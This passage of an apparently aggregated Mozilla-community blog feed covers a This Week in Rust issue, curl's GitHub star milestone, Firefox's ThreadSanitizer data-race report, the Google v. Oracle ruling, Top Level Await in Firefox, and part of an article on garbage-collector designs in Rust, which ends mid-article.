It never lasts very long. I finish that coffee, get my feet down again and get back to work. There are pull requests to review that might soon be ready for merge when the feature window opens and there are things left to fix that we didn’t get to in this past release that would be awesome to have done in the next!

Can we open the feature window again on the coming Monday?


Coffee Image by Karolina Grabowska from Pixabay

This Week In RustThis Week in Rust 385

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

No papers/research projects this week.

Project/Tooling Updates
Rust Walkthroughs

Crate of the Week

This week's crate is rs-pbrt, a counterpart to the PBRT book's (3rd edition) C++ code.

Thanks to Jan Walter for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

313 pull requests were merged in the last week

Rust Compiler Performance Triage

A pretty major week for memory usage improvements with an average of ~20% gains on memory usage for release builds, and 5% on check builds, due to an update in the default allocator used (to a more recent jemalloc). Wall time performance remained largely unchanged over this week.

Triage done by @simulacrum. Revision range: 4896450e..d32238

1 Regressions, 4 Improvements, 0 Mixed

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

New RFCs

Upcoming Events

North America
Asia Pacific

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

IOTA Foundation

Parity Technologies



Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Sadly there was no quote nominated for this week.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Niko MatsakisAsync Vision Doc Writing Sessions IV

My week is very scheduled, so I am not able to host any public drafting sessions this week – however, Ryan Levick will be hosting two sessions!

When Who Topic
Thu at 07:00 ET Ryan The need for Async Traits
Fri at 07:00 ET Ryan Challenges from cancellation

If you’re available and those stories sound like something that interests you, please join him! Just ping me or Ryan on Discord or Zulip and we’ll send you the Zoom link. If you’ve already joined a previous session, the link is the same as before.

Sneak peek: Next week

Next week, we will be holding more vision doc writing sessions. We are now going to expand the scope to go beyond “status quo” stories and cover “shiny future” stories as well. Keep your eyes peeled for a post on the Rust blog and further updates!

The vision…what?

Never heard of the async vision doc? It’s a new thing we’re trying as part of the Async Foundations Working Group:

We are launching a collaborative effort to build a shared vision document for Async Rust. Our goal is to engage the entire community in a collective act of the imagination: how can we make the end-to-end experience of using Async I/O not only a pragmatic choice, but a joyful one?

Read the full blog post for more.

Daniel Stenberg20,000 github stars

In September 2018 I celebrated 10,000 stars, up from 5,000 back in May 2017. We made 1,000 stars on August 12, 2014.

Today I’m cheering for the 20,000 stars curl has received on GitHub.

It is worth repeating that this is just a number without any particular meaning or importance. It just means 20,000 GitHub users clicked the star symbol for the curl project over at curl/curl.

At exactly 08:15:23 UTC today we reached this milestone. Checked with a curl command line like this:

$ curl -s https://api.github.com/repos/curl/curl | jq '.stargazers_count'

(By the time I get around to finalize this post, the count has already gone up to 20087…)

To celebrate this occasion, I decided I was worth a beer and this time I went with a hand-written note. The beer was a Swedish hazy IPA called Amazing Haze from the brewery Stigbergets. One of my current favorites.

Photos from previous GitHub-star celebrations :

Hacks.Mozilla.OrgEliminating Data Races in Firefox – A Technical Report

We successfully deployed ThreadSanitizer in the Firefox project to eliminate data races in our remaining C/C++ components. In the process, we found several impactful bugs and can safely say that data races are often underestimated in terms of their impact on program correctness. We recommend that all multithreaded C/C++ projects adopt the ThreadSanitizer tool to enhance code quality.

What is ThreadSanitizer?

ThreadSanitizer (TSan) is compile-time instrumentation to detect data races according to the C/C++ memory model on Linux. It is important to note that these data races are considered undefined behavior within the C/C++ specification. As such, the compiler is free to assume that data races do not happen and perform optimizations under that assumption. Detecting bugs resulting from such optimizations can be hard, and data races often have an intermittent nature due to thread scheduling.

Without a tool like ThreadSanitizer, even the most experienced developers can spend hours on locating such a bug. With ThreadSanitizer, you get a comprehensive data race report that often contains all of the information needed to fix the problem.

An example for a ThreadSanitizer report, showing where each thread is reading/writing, the location they both access and where the threads were created. ThreadSanitizer Output for this example program (shortened for article)

One important property of TSan is that, when properly deployed, the data race detection does not produce false positives. This is incredibly important for tool adoption, as developers quickly lose faith in tools that produce uncertain results.

Like other sanitizers, TSan is built into Clang and can be used with any recent Clang/LLVM toolchain. If your C/C++ project already uses e.g. AddressSanitizer (which we also highly recommend), deploying ThreadSanitizer will be very straightforward from a toolchain perspective.

Challenges in Deployment

Benign vs. Impactful Bugs

Despite ThreadSanitizer being a very well designed tool, we had to overcome a variety of challenges at Mozilla during the deployment phase. The most significant issue we faced was that it is really difficult to prove that data races are actually harmful at all and that they impact the everyday use of Firefox. In particular, the term “benign” came up often. Benign data races acknowledge that a particular data race is actually a race, but assume that it does not have any negative side effects.

While benign data races do exist, we found (in agreement with previous work on this subject [1] [2]) that data races are very easily misclassified as benign. The reasons for this are clear: It is hard to reason about what compilers can and will optimize, and confirmation for certain “benign” data races requires you to look at the assembler code that the compiler finally produces.

Needless to say, this procedure is often much more time consuming than fixing the actual data race and also not future-proof. As a result, we decided that the ultimate goal should be a “no data races” policy that declares even benign data races as undesirable due to their risk of misclassification, the required time for investigation and the potential risk from future compilers (with better optimizations) or future platforms (e.g. ARM).

However, it was clear that establishing such a policy would require a lot of work, both on the technical side as well as in convincing developers and management. In particular, we could not expect a large amount of resources to be dedicated to fixing data races with no clear product impact. This is where TSan’s suppression list came in handy:

We knew we had to stop the influx of new data races but at the same time get the tool usable without fixing all legacy issues. The suppression list (in particular the version compiled into Firefox) allowed us to temporarily ignore data races once we had them on file and ultimately bring up a TSan build of Firefox in CI that would automatically avoid further regressions. Of course, security bugs required specialized handling, but were usually easy to recognize (e.g. racing on non-thread safe pointers) and were fixed quickly without suppressions.

To help us understand the impact of our work, we maintained an internal list of all the most serious races that TSan detected (ones that had side-effects or could cause crashes). This data helped convince developers that the tool was making their lives easier while also clearly justifying the work to management.

In addition to this qualitative data, we also decided for a more quantitative approach: We looked at all the bugs we found over a year and how they were classified. Of the 64 bugs we looked at, 34% were classified as “benign” and 22% were “impactful” (the rest hadn’t been classified).

We knew there was a certain amount of misclassified benign issues to be expected, but what we really wanted to know was: Do benign issues pose a risk to the project? Assuming that all of these issues truly had no impact on the product, are we wasting a lot of resources on fixing them? Thankfully, we found that the majority of these fixes were trivial and/or improved code quality.

The trivial fixes were mostly turning non-atomic variables into atomics (20%), adding permanent suppressions for upstream issues that we couldn’t address immediately (15%), or removing overly complicated code (20%). Only 45% of the benign fixes actually required some sort of more elaborate patch (as in, the diff was larger than just a few lines of code and did not just remove code).

We concluded that the risk of benign issues being a major resource sink was not an issue and well acceptable for the overall gains that the project provided.

False Positives?

As mentioned in the beginning, TSan does not produce false positive data race reports when properly deployed, which includes instrumenting all code that is loaded into the process and avoiding primitives that TSan doesn’t understand (such as atomic fences). For most projects these conditions are trivial, but larger projects like Firefox require a bit more work. Thankfully this work largely amounted to a few lines in TSan’s robust suppression system.

Instrumenting all code in Firefox isn’t currently possible because it needs to use shared system libraries like GTK and X11. Fortunately, TSan offers the “called_from_lib” feature that can be used in the suppression list to ignore any calls originating from those shared libraries. Our other major source of uninstrumented code was build flags not being properly passed around, which was especially problematic for Rust code (see the Rust section below).

As for unsupported primitives, the only issue we ran into was the lack of support for fences. Most fences were the result of a standard atomic reference counting idiom which could be trivially replaced with an atomic load in TSan builds. Unfortunately, fences are fundamental to the design of the crossbeam crate (a foundational concurrency library in Rust), and the only solution for this was a suppression.

We also found that there is a (well known) false positive in deadlock detection that is however very easy to spot and also does not affect data race detection/reporting at all. In a nutshell, any deadlock report that only involves a single thread is likely this false positive.

The only true false positive we found so far turned out to be a rare bug in TSan and was fixed in the tool itself. However, developers claimed on various occasions that a particular report must be a false positive. In all of these cases, it turned out that TSan was indeed right and the problem was just very subtle and hard to understand. This is again confirming that we need tools like TSan to help us eliminate this class of bugs.

Interesting Bugs

Currently, the TSan bug-o-rama contains around 20 bugs. We’re still working on fixes for some of these bugs and would like to point out several particularly interesting/impactful ones.

Beware Bitfields

Bitfields are a handy little convenience to save space for storing lots of different small values. For instance, rather than having 30 bools taking up 240 bytes, they can all be packed into 4 bytes. For the most part this works fine, but it has one nasty consequence: different pieces of data now alias. This means that accessing “neighboring” bitfields is actually accessing the same memory, and therefore a potential data race.

In practical terms, this means that if two threads are writing to two neighboring bitfields, one of the writes can get lost, as both of those writes are actually read-modify-write operations of all the bitfields:

If you’re familiar with bitfields and actively thinking about them, this might be obvious, but when you’re just saying myVal.isInitialized = true you may not think about or even realize that you’re accessing a bitfield.

We have had many instances of this problem, but let’s look at bug 1601940 and its (trimmed) race report:

When we first saw this report, it was puzzling because the two threads in question touch different fields (mAsyncTransformAppliedToContent vs. mTestAttributeAppliers). However, as it turns out, these two fields are both adjacent bitfields in the class.

This was causing intermittent failures in our CI and cost a maintainer of this code valuable time. We find this bug particularly interesting because it demonstrates how hard it is to diagnose data races without appropriate tooling and we found more instances of this type of bug (racy bitfield write/write) in our codebase. One of the other instances even had the potential to cause network loads to supply invalid cache content, another hard-to-debug situation, especially when it is intermittent and therefore not easily reproducible.

We encountered this enough that we eventually introduced a MOZ_ATOMIC_BITFIELDS macro that generates bitfields with atomic load/store methods. This allowed us to quickly fix problematic bitfields for the maintainers of each component without having to redesign their types.

Oops That Wasn’t Supposed To Be Multithreaded

We also found several instances of components which were explicitly designed to be single-threaded accidentally being used by multiple threads, such as bug 1681950:

The race itself here is rather simple, we are racing on the same file through stat64 and understanding the report was not the problem this time. However, as can be seen from frame 10, this call originates from the PreferencesWriter, which is responsible for writing changes to the prefs.js file, the central storage for Firefox preferences.

It was never intended for this to be called on multiple threads at the same time and we believe that this had the potential to corrupt the prefs.js file. As a result, during the next startup the file would fail to load and be discarded (reset to default prefs). Over the years, we’ve had quite a few bug reports related to this file magically losing its custom preferences but we were never able to find the root cause. We now believe that this bug is at least partially responsible for these losses.

We think this is a particularly good example of a failure for two reasons: it was a race that had more harmful effects than just a crash, and it caught a larger logic error of something being used outside of its original design parameters.

Late-Validated Races

On several occasions we encountered a pattern that lies on the boundary of benign that we think merits some extra attention: intentionally racily reading a value, but then later doing checks that properly validate it. For instance, code like:

See for example, this instance we encountered in SQLite.

Please Don’t Do This. These patterns are really fragile and they’re ultimately undefined behavior, even if they generally work right. Just write proper atomic code — you’ll usually find that the performance is perfectly fine.

What about Rust?

Another difficulty that we had to solve during TSan deployment was due to part of our codebase now being written in Rust, which has much less mature support for sanitizers. This meant that we spent a significant portion of our bringup with all Rust code suppressed while that tooling was still being developed.

We weren’t particularly concerned with our Rust code having a lot of races, but rather races in C++ code being obfuscated by passing through Rust. In fact, we strongly recommend writing new projects entirely in Rust to avoid data races altogether.

The hardest part in particular is the need to rebuild the Rust standard library with TSan instrumentation. On nightly there is an unstable feature, -Zbuild-std, that lets us do exactly that, but it still has a lot of rough edges.

Our biggest hurdle with build-std was that it’s currently incompatible with vendored build environments, which Firefox uses. Fixing this isn’t simple because cargo’s tools for patching in dependencies aren’t designed for affecting only a subgraph (i.e. just std and not your own code). So far, we have mitigated this by maintaining a small set of patches on top of rustc/cargo which implement this well-enough for Firefox but need further work to go upstream.

But with build-std hacked into working for us we were able to instrument our Rust code and were happy to find that there were very few problems! Most of the things we discovered were C++ races that happened to pass through some Rust code and had therefore been hidden by our blanket suppressions.

We did however find two pure Rust races:

The first was bug 1674770, which was a bug in the parking_lot library. This Rust library provides synchronization primitives and other concurrency tools and is written and maintained by experts. We did not investigate the impact but the issue was a couple atomic orderings being too weak and was fixed quickly by the authors. This is yet another example that proves how difficult it is to write bug-free concurrent code.

The second was bug 1686158, which was some code in WebRender’s software OpenGL shim. They were maintaining some hand-rolled shared-mutable state using raw atomics for part of the implementation but forgot to make one of the fields atomic. This was easy enough to fix.

Overall Rust appears to be fulfilling one of its original design goals: allowing us to write more concurrent code safely. Both WebRender and Stylo are very large and pervasively multi-threaded, but have had minimal threading issues. What issues we did find were mistakes in the implementations of low-level and explicitly unsafe multithreading abstractions — and those mistakes were simple to fix.

This is in contrast to many of our C++ races, which often involved things being randomly accessed on different threads with unclear semantics, necessitating non-trivial refactorings of the code.


Data races are an underestimated problem. Due to their complexity and intermittency, we often struggle to identify them, locate their cause and judge their impact correctly. In many cases, this is also a time-consuming process, wasting valuable resources. ThreadSanitizer has proven to be not just effective in locating data races and providing adequate debug information, but also to be practical even on a project as large as Firefox.


We would like to thank the authors of ThreadSanitizer for providing the tool and in particular Dmitry Vyukov (Google) for helping us with some complex, Firefox-specific edge cases during deployment.

The post Eliminating Data Races in Firefox – A Technical Report appeared first on Mozilla Hacks - the Web developer blog.

Andrew HalberstadtA Better Replacement for ls

If it ain’t broke don’t fix it.

This old addage is valuable advice that has been passed down through generations. But it hasn’t stopped these people from rewriting command line tools perfected 30+ years ago in Rust.

This week we’ll take a quick look at exa, a replacement for ls. So why should you ignore the wise advice from the addage and replace ls? Because there are marginal improvements to be had, duh! Although the improvements in this case are far from marginal.

The Mozilla BlogSoftware Innovation Prevails in Landmark Supreme Court Ruling in Google v. Oracle

In an important victory for software developers, the Supreme Court ruled today that reimplementing an API is fair use under US copyright law. The Court’s reasoning should apply to all cases where developers reimplement an API, to enable interoperability, or to allow developers to use familiar commands. This resolves years of uncertainty, and will enable more competition and follow-on innovation in software.

Yes you would – Credit: Parker Higgins (https://twitter.com/XOR)

This ruling arrives after more than ten years of litigation, including two trials and two appellate rulings from the Federal Circuit. Mozilla, together with other amici, filed several briefs throughout this time because we believed the rulings were at odds with how software is developed, and could hinder the industry. Fortunately, in a 6-2 decision authored by Justice Breyer, the Supreme Court overturned the Federal Circuit’s error.

When the case reached the Supreme Court, Mozilla filed an amicus brief arguing that APIs should not be copyrightable or, alternatively, reimplementation of APIs should be covered by fair use. The Court took the second of these options:

We reach the conclusion that in this case, where Google reimplemented a user interface, taking only what was needed to allow users to put their accrued talents to work in a new and transformative program, Google’s copying of the Sun Java API was a fair use of that material as a matter of law.

In reaching his conclusion, Justice Breyer noted that reimplementing an API “can further the development of computer programs.” This is because it enables programmers to use their knowledge and skills to build new software. The value of APIs is not so much in the creative content of the API itself (e.g. whether a particular API is “Java.lang.Math.max” or, as the Federal Circuit once suggested as an alternative, ““Java.lang.Arith.Larger”) but in the acquired experience of the developer community that uses it.

We are pleased that the Supreme Court has reached this decision and that copyright will no longer stand in the way of software developers reimplementing APIs in socially, technologically, and economically beneficial ways.

The post Software Innovation Prevails in Landmark Supreme Court Ruling in Google v. Oracle appeared first on The Mozilla Blog.

Spidermonkey Development BlogTop Level Await Ships with Firefox 89

Firefox will ship Top Level Await by default starting in Firefox 89. This new feature introduces a capability to modules allowing programmers to do asynchronous work, such as fetching data, directly at the top level of any module.

For example, if you want to instantiate your file with some custom data, you can now do this:

import process from "./api.js";

const response = await fetch("./data.json");
const parsedData = await response.json();

export process(parsedData);

This is much simpler and robust than previous solutions, such as:

import { process } from "./some-module.mjs";
let output;
async function main() {
  const response = await fetch("./data.json");
  const parsedData = await response.json();
  output = process(parsedData);
export { output };

… in which case, any consumer of this module would need check when the output variable is bound.

If you are curious about this proposal, you can read more about it in the explainer. The proposal is currently at stage 3, but we have high confidence in it going to stage 4.

Happy Hacking!

The Firefox FrontierMozilla Explains: Cookies and supercookies

Every time you visit a website and it seems to remember you, that’s a cookie at work. You might have heard that all cookies are bad, but reality is a … Read more

The post Mozilla Explains: Cookies and supercookies appeared first on The Firefox Frontier.

Manish GoregaokarA Tour of Safe Tracing GC Designs in Rust

I’ve been thinking about garbage collection in Rust for a long time, ever since I started working on Servo’s JS layer. I’ve designed a GC library, worked on GC integration ideas for Rust itself, worked on Servo’s JS GC integration, and helped out with a couple other GC projects in Rust.

As a result, I tend to get pulled into GC discussions fairly often. I enjoy talking about GCs – don’t get me wrong – but I often end up going over the same stuff. Being lazy I’d much prefer to be able to refer people to a single place where they can get up to speed on the general space of GC design, after which it’s possible to have more in depth discussions about the specific tradeoffs necessary.

I’ll note that some of the GCs in this post are experiments or unmaintained. The goal of this post is to showcase these as examples of design, not necessarily general-purpose crates you may wish to use, though some of them are usable crates as well.

A note on terminology

A thing that often muddles discussions about GCs is that according to some definition of “GC”, simple reference counting is a GC. Typically the definition of GC used in academia broadly refers to any kind of automatic memory management. However, most programmers familiar with the term “GC” will usually liken it to “what Java, Go, Haskell, and C# do”, which can be unambiguously referred to as tracing garbage collection.

Tracing garbage collection is the kind which keeps track of which heap objects are directly reachable (“roots”), figures out the whole set of reachable heap objects (“tracing”, also, “marking”), and then cleans them up (“sweeping”).

Throughout this blog post I will use the term “GC” to refer to tracing garbage collection/collectors unless otherwise stated1.

Why write GCs for Rust?

(If you already want to write a GC in Rust and are reading this post to get ideas for how, you can skip this section. You already know why someone would want to write a GC for Rust)

Every time this topic is brought up someone will inevitably go “I thought the point of Rust was to avoid GCs” or “GCs will ruin Rust” or something. As a general rule it’s good to not give too much weight to the comments section, but I think it’s useful to explain why someone may wish for GC-like semantics in Rust.

There are really two distinct kinds of use cases. Firstly, sometimes you need to manage memory with cycles and Rc<T> is inadequate for the job since Rc-cycles get leaked. petgraph or an arena are often acceptable solutions for this kind of pattern, but not always, especially if your data is super heterogeneous. This kind of thing crops up often when dealing with concurrent datastructures; for example crossbeam has an epoch-based memory management system which, while not a full tracing GC, has a lot of characteristics in common with GCs.

For this use case it’s rarely necessary to design a custom GC, you can look for a reusable crate like gc 2.

The second case is far more interesting in my experience, and since it cannot be solved by off-the-shelf solutions tends to crop up more often: integration with (or implementation of) programming languages that do use a garbage collector. Servo needs to do this for integrating with the Spidermonkey JS engine and luster needed to do this for implementing the GC of its Lua VM. boa, a pure Rust JS runtime, uses the gc crate to back its garbage collector.

Sometimes when integrating with a GCd language you can get away with not needing to implement a full garbage collector: JNI does this; while C++ does not have native garbage collection, JNI gets around this by simply “rooting” (we’ll cover what that means in a bit) anything that crosses over to the C++ side3. This is often fine!

The downside of this is that every interaction with objects managed by the GC has to go through an API call; you can’t “embed” efficient Rust/C++ objects in the GC with ease. For example, in browsers most DOM types (e.g. Element) are implemented in native code; and need to be able to contain references to other native GC’d types (it should be possible to inspect the children of a Node without needing to call back into the JavaScript engine).

So sometimes you need to be able to integrate with a GC from a runtime; or even implement your own GC if you are writing a runtime that needs one. In both of these cases you typically want to be able to safely manipulate GC’d objects from Rust code, and even directly put Rust types on the GC heap.

Why are GCs in Rust hard?

In one word: Rooting. In a garbage collector, the objects “directly” in use on the stack are the “roots”, and you need to be able to identify them. Here, when I say “directly”, I mean “accessible without having to go through other GC’d objects”, so putting an object inside a Vec<T> does not make it stop being a root, but putting it inside some other GC’d object does.

Unfortunately, Rust doesn’t really have a concept of “directly on the stack”:

struct Foo {
    bar: Option<Gc<Bar>>
// this is a root
let bar = Gc::new(Bar::new());
// this is also a root
let foo = Gc::new(Foo::new());
// bar should no longer be a root (but we can't detect that!)
foo.bar = Some(bar);
// but foo should still be a root here since it's not inside
// another GC'd object
let v = vec![foo];

Rust’s ownership system actually makes it easier to have fewer roots since it’s relatively easy to state that taking &T of a GC’d object doesn’t need to create a new root, and let Rust’s ownership system sort it out, but being able to distinguish between “directly owned” and “indirectly owned” is super tricky.

Another aspect of this is that garbage collection is really a moment of global mutation – the garbage collector reads through the heap and then deletes some of the objects there. This is a moment of the rug being pulled out under your feet. Rust’s entire design is predicated on such rug-pulling being very very bad and not to be allowed, so this can be a bit problematic. This isn’t as bad as it may initially sound because after all the rug-pulling is mostly just cleaning up unreachable objects, but it does crop up a couple times when fitting things together, especially around destructors and finalizers4. Rooting would be far easier if, for example, you were able to declare areas of code where “no GC can happen”5 so you can tightly scope the rug-pulling and have to worry less about roots.

Destructors and finalizers

It’s worth calling out destructors in particular. A huge problem with custom destructors on GCd types is that the custom destructor totally can stash itself away into a long-lived reference during garbage collection, leading to a dangling reference:

struct LongLived {
    dangle: RefCell<Option<Gc<CantKillMe>>>

struct CantKillMe {
    // set up to point to itself during construction
    self_ref: RefCell<Option<Gc<CantKillMe>>>
    long_lived: Gc<Foo>

impl Drop for CantKillMe {
    fn drop(&mut self) {
        // attach self to long_lived
        *self.long_lived.dangle.borrow_mut() = Some(self.self_ref.borrow().clone().unwrap());

let long = Gc::new(LongLived::new());
    let cant = Gc::new(CantKillMe::new());
    *cant.self_ref.borrow_mut() = Some(cant.clone());
    // cant goes out of scope, CantKillMe::drop is run
    // cant is attached to long_lived.dangle but still cleaned up

// Dangling reference!
let dangling = long.dangle.borrow().unwrap();

The most common solution here is to disallow destructors on types that use #[derive(Trace)], which can be done by having the custom derive generate a Drop implementation, or have it generate something which causes a conflicting type error.

You can additionally provide a Finalize trait that has different semantics: the GC calls it while cleaning up GC objects, but it may be called multiple times or not at all. This kind of thing is typical in GCs outside of Rust as well.

How would you even garbage collect without a runtime?

In most garbage collected languages, there’s a runtime that controls all execution, knows about every variable in the program, and is able to pause execution to run the GC whenever it likes.

Rust has a minimal runtime and can’t do anything like this, especially not in a pluggable way your library can hook in to. For thread local GCs you basically have to write it such that GC operations (things like mutating a GC field; basically some subset of the APIs exposed by your GC library) are the only things that may trigger the garbage collector.

Concurrent GCs can trigger the GC on a separate thread but will typically need to pause other threads whenever these threads attempt to perform a GC operation that could potentially be invalidated by the running garbage collector.

While this may restrict the flexibility of the garbage collector itself, this is actually pretty good for us from the side of API design: the garbage collection phase can only happen in certain well-known moments of the code, which means we only need to make things safe across those boundaries. Many of the designs we shall look at build off of this observation.


Before getting into the actual examples of GC design, I want to point out some commonalities of design between all of them, especially around how they do tracing:


“Tracing” is the operation of traversing the graph of GC objects, starting from your roots and perusing their children, and their children’s children, and so on.

In Rust, the easiest way to implement this is via a custom derive:

// unsafe to implement by hand since you can get it wrong
unsafe trait Trace {
    fn trace(&mut self, gc_context: &mut GcContext);

struct Foo {
    vec: Vec<Gc<Bar>>,
    extra_thing: Gc<Baz>,
    just_a_string: String

The custom derive of Trace basically just calls trace() on all the fields. Vec’s Trace implementation will be written to call trace() on all of its fields, and String’s Trace implementation will do nothing. Gc<T> will likely have a trace() that marks its reachability in the GcContext, or something similar.

This is a pretty standard pattern, and while the specifics of the Trace trait will typically vary, the general idea is roughly the same.

I’m not going to get into the actual details of how mark-and-sweep algorithms work in this post; there are a lot of potential designs for them and they’re not that interesting from the point of view of designing a safe GC API in Rust. However, the general idea is to keep a queue of found objects initially populated by the root, trace them to find new objects and queue them up if they’ve not already been traced. Clean up any objects that were not found.


Another commonality between these designs is that a Gc<T> is always potentially shared, and thus will need tight control over mutability to satisfy Rust’s ownership invariants. This is typically achieved by using interior mutability, much like how Rc<T> is almost always paired with RefCell<T> for mutation, however some approaches (like that in josephine) do allow for mutability without runtime checking.


Some GCs are single-threaded, and some are multi-threaded. The single threaded ones typically have a Gc<T> type that is not Send, so while you can set up multiple graphs of GC types on different threads, they’re essentially independent. Garbage collection only affects the thread it is being performed for, all other threads can continue unhindered.

Multithreaded GCs will have a Send Gc<T> type. Garbage collection will typically, but not always, block any thread which attempts to access data managed by the GC during that time. In some languages there are “stop the world” garbage collectors which block all threads at “safepoints” inserted by the compiler; Rust does not have the capability to insert such safepoints and blocking threads on GCs is done at the library level.

Most of the examples below are single-threaded, but their API design is not hard to extend towards a hypothetical multithreaded GC.


The gc crate is one I wrote with Nika Layzell mostly as a fun exercise, to figure out if a safe GC API is possible. I’ve written about the design in depth before, but the essence of the design is that it does something similar to reference counting to keep track of roots, and forces all GC mutations go through special GcCell types so that they can update the root count. Basically, a “root count” is updated whenever something becomes a root or stops being a root:

struct Foo {
    bar: GcCell<Option<Gc<Bar>>>
// this is a root (root count = 1)
let bar = Gc::new(Bar::new());
// this is also a root (root count = 1)
let foo = Gc::new(Foo::new());
// .borrow_mut()'s RAII guard unroots bar (sets its root count to 0)
*foo.bar.borrow_mut() = Some(bar);
// foo is still a root here, no call to .set()
let v = vec![foo];

// at destrucion time, foo's root count is set to 0

The actual garbage collection phase will occur when certain GC operations are performed at a time when the heap is considered to have gotten reasonably large according to some heuristics.

While this is essentially “free” on reads, this is a fair amount of reference count traffic on any kind of write, which might not be desired; often the goal of using GCs is to avoid the performance characteristics of reference-counting-like patterns. Ultimately this is a hybrid approach that’s a mix of tracing and reference counting6.

gc is useful as a general-purpose GC if you just want a couple of things to participate in cycles without having to think about it too much. The general design can apply to a specialized GC integrating with another language runtime since it provides a clear way to keep track of roots; but it may not necessarily have the desired performance characteristics.

Servo’s DOM integration

Servo is a browser engine in Rust that I used to work on full time. As mentioned earlier, browser engines typically implement a lot of their DOM types in native (i.e. Rust or C++, not JS) code, so for example Node is a pure Rust object, and it contains direct references to its children so Rust code can do things like traverse the tree without having to go back and forth between JS and Rust.

Servo’s model is a little weird: roots are a different type, and lints enforce that unrooted heap references are never placed on the stack:

#[dom_struct] // this is #[derive(JSTraceable)] plus some markers for lints
pub struct Node {
    // the parent type, for inheritance
    eventtarget: EventTarget,
    // in the actual code this is a different helper type that combines
    // the RefCell, Option, and Dom, but i've simplified it to use
    // stdlib types for this example
    prev_sibling: RefCell<Option<Dom<Node>>>,
    next_sibling: RefCell<Option<Dom<Node>>>,
    // ...

impl Node {
    fn frob_next_sibling(&self) {
        // fields can be accessed as borrows without any rooting
        if let Some(next) = self.next_sibling.borrow().as_ref() {

    fn get_next_sibling(&self) -> Option<DomRoot<Node>> {
        // but you need to root things for them to escape the borrow
        // .root() turns Dom<T> into DomRoot<T>
        self.next_sibling.borrow().as_ref().map(|x| x.root())

    fn illegal(&self) {
        // this line of code would get linted by a custom lint called unrooted_must_root
        // (which works somewhat similarly to the must_use stuff that Rust does)
        let ohno: Dom<Node> = self.next_sibling.borrow_mut().take();

Dom<T> is basically a smart pointer that behaves like &T but without a lifetime, whereas DomRoot<T> has the additional behavior of rooting on creation (and unrooting on Drop). The custom lint plugin essentially enforces that Dom<T>, and any DOM structs (tagged with #[dom_struct]) are never accessible on the stack aside from through DomRoot<T> or &T.

I wouldn’t recommend this approach; it works okay but we’ve wanted to move off of it for a while because it relies on custom plugin lints for soundness. But it’s worth mentioning for completeness.

Josephine (Servo’s experimental GC plans)

Given that Servo’s existing GC solution depends on plugging in to the compiler to do additional static analysis, we wanted something better. So Alan designed Josephine (“JS affine”), which uses Rust’s affine types and borrowing in a cleaner way to provide a safe GC system.

Josephine is explicitly designed for Servo’s use case and as such does a lot of neat things around “compartments” and such that are probably irrelevant unless you specifically wish for your GC to integrate with a JS engine.

I mentioned earlier that the fact that the garbage collection phase can only happen in certain well-known moments of the code actually can make things easier for GC design, and Josephine is an example of this.

Josephine has a “JS context”, which is to be passed around everywhere and essentially represents the GC itself. When doing operations which may trigger a GC, you have to borrow the context mutably, whereas when accessing heap objects you need to borrow the context immutably. You can root heap objects to remove this requirement:

// cx is a `JSContext`, `node` is a `JSManaged<'a, C, Node>`
// assuming next_sibling and prev_sibling are not Options for simplicity

// borrows cx for `'b`
let next_sibling: &'b Node = node.next_sibling.borrow(cx);
println!("Name: {:?}", next_sibling.name);
// illegal, because cx is immutably borrowed by next_sibling
// node.prev_sibling.borrow_mut(cx).frob();

// read from next_sibling to ensure it lives this long
println!("{:?}", next_sibling.name);

let ref mut root = cx.new_root();
// no longer needs to borrow cx, borrows root for 'root instead
let next_sibling: JSManaged<'root, C, Node> = node.next_sibling.in_root(root);
// now it's fine, no outstanding borrows of `cx`

// read from next_sibling to ensure it lives this long
println!("{:?}", next_sibling.name);

new_root() creates a new root, and in_root ties the lifetime of a JS managed type to the root instead of to the JSContext borrow, releasing the borrow of the JSContext and allowing it to be borrowed mutably in future .borrow_mut() calls.

Note that .borrow() and .borrow_mut() here do not have runtime borrow-checking cost despite their similarities to RefCell::borrow(), they instead are doing some lifetime juggling to make things safe. Creating roots typically does have runtime cost. Sometimes you may need to use RefCell<T> for the same reason it’s used in Rc, but mostly only for non-GCd fields.

Custom types are typically defined in two parts as so:

#[derive(Copy, Clone, Debug, Eq, PartialEq, JSTraceable, JSLifetime, JSCompartmental)]
pub struct Element<'a, C> (pub JSManaged<'a, C, NativeElement<'a, C>>);

#[derive(JSTraceable, JSLifetime, JSCompartmental)]
pub struct NativeElement<'a, C> {
    name: JSString<'a, C>,
    parent: Option<Element<'a, C>>,
    children: Vec<Element<'a, C>>,

where Element<'a> is a convenient copyable reference that is to be used inside other GC types, and NativeElement<'a> is its backing storage. The C parameter has to do with compartments and can be ignored for now.

A neat thing worth pointing out is that there’s no runtime borrow checking necessary for manipulating other GC references, even though roots let you hold multiple references to the same object!

let parent_root = cx.new_root();
let parent = element.borrow(cx).parent.in_root(parent_root);
let ref mut child_root = cx.new_root();

// could potentially be a second reference to `element` if it was
// the first child
let first_child = parent.children[0].in_root(child_root);

// this is okay, even though we hold a reference to `parent`
// via element.parent, because we have rooted that reference so it's
// now independent of whether `element.parent` changes!
first_child.borrow_mut(cx).parent = None;

Essentially, when mutating a field, you have to obtain mutable access to the context, so there will not be any references to the field itself still around (e.g. element.borrow(cx).parent), only to the GC’d data within it, so you can change what a field references without invalidating other references to the contents of what the field references. This is a pretty cool trick that enables GC without runtime-checked interior mutability, which is relatively rare in such designs.

Unfinished design for a builtin Rust GC

